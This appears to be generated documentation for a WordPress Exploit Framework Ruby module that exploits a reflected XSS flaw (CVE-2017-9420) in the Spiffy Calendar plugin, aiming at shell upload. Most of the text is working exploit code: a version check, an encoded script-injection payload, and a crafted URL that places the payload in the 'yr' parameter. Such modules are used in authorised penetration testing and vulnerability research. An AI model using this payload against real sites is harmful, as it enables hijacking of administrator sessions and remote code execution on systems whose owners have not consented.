class Wpxf::Exploit::SpiffyCalendarReflectedXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb, line 7
def initialize
  super

  update_info(
    name: 'Spiffy Calendar <= 3.2.0 Reflected XSS Shell Upload',
    author: [
      'DTSA',      # Discovery
      'rastating'  # WPXF module
    ],
    references: [
      ['WPVDB', '8842'],
      ['CVE', '2017-9420'],
      ['URL', 'https://dtsa.eu/cve-2017-9420-wordpress-spiffy-calendar-v-3-2-0-reflected-cross-site-scripting-xss/']
    ],
    date: 'Jun 02 2017'
  )

  register_option(
    StringOption.new(
      name: 'calendar_path',
      desc: 'The relative path or absolute URL of the calendar',
      required: true
    )
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb, line 33
def check
  readme = normalize_uri(wordpress_url_plugins, 'spiffy-calendar', 'readme.txt')
  check_version_from_custom_file(readme, /=\sVersion\s((\d+\.?)+).+?=/, '3.3')
end
url_payload() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb, line 42
def url_payload
  url_encode("#{DateTime.now.year}\"><script>#{xss_ascii_encoded_include_script}</script>")
end
url_with_xss() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb, line 46
def url_with_xss
  "#{vulnerable_url}?month=#{Utility::Text.rand_month[0..2]}&yr=#{url_payload}"
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb, line 38
def vulnerable_url
  normalize_relative_uri(datastore['calendar_path'])
end